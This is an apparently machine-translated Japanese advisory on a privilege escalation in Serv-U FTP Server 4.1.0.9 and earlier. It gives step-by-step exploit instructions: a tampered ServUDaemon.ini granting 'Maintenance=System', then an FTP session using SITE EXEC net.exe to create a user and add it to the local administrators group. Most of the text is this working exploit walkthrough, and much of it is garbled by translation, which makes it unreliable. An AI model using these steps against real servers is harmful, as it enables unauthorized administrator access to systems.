ローカル特権:はい
リモート特権を昇格:はい
使用条件:アクセス許可が変更にサーバ= Uのプロファイル
免責事項:これはちょうど、特権の昇格のアイデアや方法がある。
1、影響を受けるソフトウェア
サーバ= UはFTPサーバー4.1.0.9(およびすべての以前のバージョン)
第二に、影響を受けるシステム
マイクロソフトWindows Server 2003のすべてのバージョン
Microsoft Windows XPのすべてのバージョン
Microsoft Windows 2000のすべてのバージョン
Microsoft Windows NTのすべてのバージョン
第三に、評価
サーバ= UはFTPサーバーがRhinoSoftに、今世界中で広く使用されるFTPのSserverソフトウェアを生産。私が見つけた後、サーバ= UはFTPサーバーの設定が格納されてサーバ= UはFTPサーバーのファイルディレクトリServUDaemon.iniファイル内のファイル。ローカル制限付きのユーザーまたはリモートの攻撃者は、一般的なアクセス許可ファイルにアクセスすると慎重にファイル構造ServUDaemon.ini FTPプロセスの内容をシステム権限で任意のコマンドを実行するシステムを使用することができますれている場合。
4、欠陥解析:
サーバ= UはFTPサーブは格納され、それ以降ServUDaemon.iniファイルをユーザーの構成情報を設定します。情報へのユーザーの権利とを含むディレクトリ情報にアクセスします。ローカル制限付きのユーザーまたはリモートの攻撃者が読むこととしてサーバ= UはFTPサーブとファイルディレクトリの長い記述すると、リモートの実現のディレクトリServUDaemon.ini FTPのプロセスでファイルを変更することができますは、FTP、ローカルシステム管理者権限を任意のコマンドを実行します。システムのバージョンや衝撃への対象ではない。この欠陥の影響を受けなしに(ユーザ情報を選択し"ストレージシステムのレジストリ")
5、試験方法:
1、ローカルテスト
ローカル制限付きユーザーをサーバ= UはFTPサーブファイルディレクトリを参照することができますと仮定します。検索ServUDaemon.iniファイルです。メモ帳を使用、元の文書としての一般的なコンテンツを開こうとする:
[グローバル]
バージョン= 4.1.0.0 / /サーバ= UはFTPサーバーのバージョン番号
processIDプロセス= 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[は]ドメイン
domain1が= 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0ファイル/ /ホストIPアドレスとドメイン名、ポートの状態
[はDomain1]
User1は= zihuanの| 1 | 0
[ユーザ= zihuanの| 1]
パスワード= rfE8DFBE3F7EC27FB043D4305A04E6D2C6
ホームディレクトリをは=はc:/ /ディレクトリを参照することができます
タイムアウト= 600
Access1の=はC:| RWAMLCDP
ServUDaemon.inとして改正ファイルがある場合、次の:
[グローバル]
バージョン= 4.1.0.0
processIDプロセス= 584
RegistratinKey = UEyz459waBR4lVRkIkh4dYw9f8v4J/AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo + wAGnUBuycB
[は]ドメイン
domain1が= 127.0.0.1 | | 21 | 127.0.0.1 | 1 | 0
[はDomain1]
User1は= zihuanの| 1 | 0
[ユーザ= zihuanの| 1]
パスワード= rfE8DFBE3F7EC27FB043D4305A04E6D2C6
ホームディレクトリを=はc:
タイムアウト= 600
メンテナンス=システムファイル/ etc /アクセス許可のタイプ
Access1の=はC:| RWAMELCDP
上記、"保守=システムは、"編集後の保存の元のコンテンツより。次に、サーバ= UはFTPサーバーに以下のコマンドの実施後のFTPのログイン情報を使用して:
ftpの は、オープンなIP
IPに接続します。
220サーバ= UはFTPサーバーv4.1.0.0 WinSockの準備のために...
ユーザー入力のユーザー(IPアドレス:(なし)):IDをファイル/ etc /構造
331ユーザー名は大丈夫、パスワードとしての完全な電子メールアドレスを送信してください。
パスワード:パスワードファイル/ /パスワード
230ユーザーで、進んで記録されます。
それはwinxpとまたはWindows Server 2003はWindowsディレクトリすべきである場合のftp は、winntディレクトリwin2k / /には、WINNTのファイルをcdします。
250ディレクトリが/ WINNTに変更
ftpの は、system32ディレクトリに/ /にsystem32にファイルをシーディー
250ディレクトリが/ WINNT/system32に変更
ftpの は、/ / /使用するシステムのNet.exeファイルに加えて、ユーザファイルを追加するサイト幹部のNet.exeユーザーzihuanのziHUANをお伝えください。
200 EXECコマンド(成功のTID = 33)。
ftpの は、/ファイル/ /スーパーユーザーにアップグレード追加サイト幹部のNet.exe localhostの管理者zihuanを引用
ローカルシステム、zihuanのパスワード:ziHUANスーパーユーザの増加。することもできます直接引用サイト幹部のNet.exe localhostの管理者ユーザ/現在のユーザーにスーパーユーザーのグループに移動にアップグレードするコマンドを追加します。もちろん、システム上で任意のコマンドを実行することができます。
ステートメント:
書籍だけで任意の保証を提供していない潜在的なセキュリティの問題を、著者、ハッカーXファイル雑誌記述するためには、このセキュリティ情報やコミットメント。情報は、この資料では、自身が責任をしているユーザーによる損失の任意の直接的または間接的な結果の結果の提供の使用の普及により、著者はこのために一切の責任を負わないものとします。著者は、このセキュリティ情報と解釈を改訂しました。この記事では、複製または送信、著作権およびその他すべてのコンテンツを含む、この資料の整合性を確保する。著者なく変更することができない許可またはこの資料の発表の内容を変更します。